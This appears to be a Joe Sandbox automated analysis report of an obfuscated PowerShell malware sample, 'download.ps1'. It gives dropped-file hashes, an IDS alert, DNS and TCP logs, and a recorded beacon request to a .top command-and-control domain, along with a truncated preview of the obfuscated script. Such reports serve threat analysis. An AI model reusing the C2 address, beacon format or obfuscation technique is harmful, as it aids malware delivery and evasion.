https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifX | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmp | false | high
https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp | false | high
Contacted IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.61.136.138 | cmacnnkfbhlcncm.top | United States | US | 40676 | AS40676 | false
142.250.181.132 | www.google.com | United States | US | 15169 | GOOGLE | false
                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1579001
                                                                                                                              Start date and time:2024-12-20 17:33:57 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 36s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:download.ps1
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 95%
                                                                                                                              • Number of executed functions: 20
                                                                                                                              • Number of non-executed functions: 5
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .ps1
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 644 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              • VT rate limit hit for: download.ps1
Time | Type | Description
11:34:55 | API Interceptor | 45x Sleep call for process: powershell.exe modified
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:NlllulVsHh:NllUGH
                                                                                                                              MD5:E396A80CD8E90276EF876FC94B5CFF7A
                                                                                                                              SHA1:6A7ED0E4173A27630A7FC30F3C325EF9D031D495
                                                                                                                              SHA-256:8B604E9275EE1B6552C36CB85EAE692225A510A26942C4AC17C68046DE9F1516
                                                                                                                              SHA-512:1CD3AD1E23744327701BF26DBAECCCA8FF426D40FACDA77F067C3A56111E9E3A48DA3EF4B990476253C73F0B08E8C4F49375422A80216BD7DD2C57995AF4AFE4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:@...e...................................2............@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6225
                                                                                                                              Entropy (8bit):3.7419014598304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:uO2+i6zuC9U20j8ukvhkvklCyw4a+jdl6iSogZoQJOJa6+jdl0iSogZoQJOJO1:S+TzuCSrpkvhkvCCt7+jduHs+jd0HH
                                                                                                                              MD5:1059F387F46686D0977809997B5A8E8A
                                                                                                                              SHA1:7C0BB71782DE878B491A9A76508667E9B102339C
                                                                                                                              SHA-256:D80FFE58FD3E0EA7D639F880BBB419EC06D27154F8B682CF56714C8DA8E35BA2
                                                                                                                              SHA-512:51BD0078661D4845098D7F04FD072993CB3EEB6588CD1FA7FE342CB186A221A505E168EB296C68A9477F4959A362C6C6CD4E9915C83BF9233CA55D544C67A9CA
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6225
                                                                                                                              Entropy (8bit):3.7419014598304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:uO2+i6zuC9U20j8ukvhkvklCyw4a+jdl6iSogZoQJOJa6+jdl0iSogZoQJOJO1:S+TzuCSrpkvhkvCCt7+jduHs+jd0HH
                                                                                                                              MD5:1059F387F46686D0977809997B5A8E8A
                                                                                                                              SHA1:7C0BB71782DE878B491A9A76508667E9B102339C
                                                                                                                              SHA-256:D80FFE58FD3E0EA7D639F880BBB419EC06D27154F8B682CF56714C8DA8E35BA2
                                                                                                                              SHA-512:51BD0078661D4845098D7F04FD072993CB3EEB6588CD1FA7FE342CB186A221A505E168EB296C68A9477F4959A362C6C6CD4E9915C83BF9233CA55D544C67A9CA
                                                                                                                              Malicious:false
                                                                                                                              File type:ASCII text, with very long lines (11087), with CRLF line terminators
                                                                                                                              Entropy (8bit):6.0047648383145775
                                                                                                                              TrID:
                                                                                                                                File name:download.ps1
                                                                                                                                File size:20'059 bytes
                                                                                                                                MD5:506d528176abebda1202676b0528e974
                                                                                                                                SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
                                                                                                                                SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
                                                                                                                                SHA512:9266f19b578ef6180585ea531c91878e1fd3d40ca204b60951746edb3eed4c7b6e119ceab1811287216c9f023bfdd511f3109a964ccaf68caf8692dac51d50a2
                                                                                                                                SSDEEP:384:Aij/eeL5dYClhTpoPzuOInAwy7rtefXgxl5vfMim7P:zmSdjzyzuOFvtefXgxlFEF
                                                                                                                                TLSH:CF927E95FBC8F8C2C5CEA61EA4177C443B8270AED5F3ADC4B6C5C6C1A2813556AD4D82
                                                                                                                                File Content Preview:$vnhmefubpw=$executioncontext;$isesenarateranerenor = ([char[]]@((-7434+7487),(-6272+6324),(8401-8344),(-4633+(10159-5476)),(-6874+(2253+4677)),(378378/7007),(333592/5957),(3330-(8577225/2619)),(67595/(2169-940)),(186-136),(-5822+(7180-1302)),(28992/(3793
                                                                                                                                Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T17:34:58.369189+0100 | 2859391 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.2.7 | 52452 | 1.1.1.1 | 53 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:34:58.603890896 CET | 49700 | 80 | 192.168.2.7 | 45.61.136.138
Dec 20, 2024 17:34:58.723922968 CET | 80 | 49700 | 45.61.136.138 | 192.168.2.7
Dec 20, 2024 17:34:58.724117041 CET | 49700 | 80 | 192.168.2.7 | 45.61.136.138
Dec 20, 2024 17:34:58.727257967 CET | 49700 | 80 | 192.168.2.7 | 45.61.136.138
Dec 20, 2024 17:34:58.847430944 CET | 80 | 49700 | 45.61.136.138 | 192.168.2.7
Dec 20, 2024 17:35:00.044008017 CET | 80 | 49700 | 45.61.136.138 | 192.168.2.7
Dec 20, 2024 17:35:00.094046116 CET | 49700 | 80 | 192.168.2.7 | 45.61.136.138
Dec 20, 2024 17:35:00.185856104 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:00.305354118 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:00.305521011 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:00.305747032 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:00.425581932 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113485098 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113584042 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113621950 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113656998 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.113723040 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113758087 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113765001 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.113794088 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113828897 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.113830090 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.114182949 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.114217043 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.114233017 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.114264965 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.114305019 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.233639002 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.233736038 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.233855009 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.305389881 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.305591106 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.305681944 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.309583902 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.310748100 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.310822964 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.310993910 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.319253922 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.319360018 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.322287083 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.322791100 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.322901011 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.328608036 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.335803032 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.335908890 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.335958958 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.339937925 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.339994907 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.349483967 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.349978924 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.350081921 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.353640079 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.363280058 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.363328934 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.363363028 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.367403030 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.367458105 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.376882076 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.377058983 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.377115965 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.381103992 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.390666962 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.390728951 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.425386906 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.425951004 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.426011086 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.429583073 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.430097103 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.430151939 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.497140884 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.497278929 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.497390985 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.499660969 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.499877930 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.499921083 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.504631042 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.506493092 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.506541014 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.507524967 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.511467934 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.511524916 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.511806011 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.511939049 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.511971951 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.516799927 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.524108887 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.524183035 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.524198055 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.526516914 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.526559114 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.537810087 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.537928104 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.538007975 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.540293932 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.551433086 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.551553011 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:02.551887989 CET | 80 | 49701 | 142.250.181.132 | 192.168.2.7
Dec 20, 2024 17:35:02.593997002 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Dec 20, 2024 17:35:03.134183884 CET | 49700 | 80 | 192.168.2.7 | 45.61.136.138
Dec 20, 2024 17:35:03.134418964 CET | 49701 | 80 | 192.168.2.7 | 142.250.181.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:34:58.369189024 CET | 52452 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 17:34:58.583211899 CET | 53 | 52452 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 17:35:00.045572042 CET | 49792 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 17:35:00.182825089 CET | 53 | 49792 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:34:58.369189024 CET | 192.168.2.7 | 1.1.1.1 | 0x3184 | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:35:00.045572042 CET | 192.168.2.7 | 1.1.1.1 | 0x6b98 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:34:58.583211899 CET | 1.1.1.1 | 192.168.2.7 | 0x3184 | No error (0) | cmacnnkfbhlcncm.top | - | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:35:00.182825089 CET | 1.1.1.1 | 192.168.2.7 | 0x6b98 | No error (0) | www.google.com | - | 142.250.181.132 | A (IP address) | IN (0x0001) | false
                                                                                                                                • cmacnnkfbhlcncm.top
                                                                                                                                • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 45.61.136.138 | 80 | 644 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:34:58.727257967 CET | 220 | OUT | GET /4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: cmacnnkfbhlcncm.top
                                                                                                                                Connection: Keep-Alive
Dec 20, 2024 17:35:00.044008017 CET | 166 | IN | HTTP/1.1 302 Found
                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                Date: Fri, 20 Dec 2024 16:34:59 GMT
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: keep-alive
                                                                                                                                Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 142.250.181.132 | 80 | 644 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:35:00.305747032 CET | 159 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: www.google.com
                                                                                                                                Connection: Keep-Alive
Dec 20, 2024 17:35:02.113485098 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Fri, 20 Dec 2024 16:35:01 GMT
                                                                                                                                Expires: -1
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-q0Qh02Fx1ZnHOkNjcAOMoA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Server: gws
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Set-Cookie: AEC=AZ6Zc-UuwSqp7jMCpK3Q7KQmFGwbwfDATqpZ2DCKsn6ORyXfP56qtTyG_4Y; expires=Wed, 18-Jun-2025 16:35:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                Set-Cookie: NID=520=aTIcA8crpYEB7IB6vvXsUR6C-Xm9ccJiDEy38Fof5DTpwmnmEtEpQO6LCpaa8MyPdIjS6YT7aesJmo6eeyIpoc-4lKojs2giYNheQ8fYtNt7g-y1b585f-ejbprZkhpUr64RwNAyPAo8UqAAB0AOz-qT1PZXbkktOBXLxMOgV_OxmTSHLFJ9_xDsTqGU4Gndn6ZTF8I_Yw; expires=Sat, 21-Jun-2025 16:35:01 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Accept-Ranges: none
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Transfer-Encoding: chunked



Target ID: 0
Start time: 11:34:50
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 11:34:50
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f3116c90203f6992768441c35d636fe399c274e8710e4aaba7f36efbdb2c36db
                                                                                                                                  • Instruction ID: 945736ee089b68ec27aba0d196df108e037bd57935800f4587cb1affba20d253
                                                                                                                                  • Opcode Fuzzy Hash: f3116c90203f6992768441c35d636fe399c274e8710e4aaba7f36efbdb2c36db
                                                                                                                                  • Instruction Fuzzy Hash: 8A81F67180EB888FE7699B68581D5B57FA0EF66314F0881BFE08D97197CA14A90887C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 974cb8c845b072bae59e36e581a8d362d2be26cf6c4646730a82910dc4525eea
                                                                                                                                  • Instruction ID: e34e94d75583464128a4eecbeecf02cf339834dd38740bc32464104d9d01f3b8
                                                                                                                                  • Opcode Fuzzy Hash: 974cb8c845b072bae59e36e581a8d362d2be26cf6c4646730a82910dc4525eea
                                                                                                                                  • Instruction Fuzzy Hash: 24B1B570509A8D8FEBA9DF28C8557F93BD1FF55310F04826AE84DC7292CA349945CB86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 735d580432cb50005971eb975777085c00af68fd8553d098c21fa1941d6ecc4c
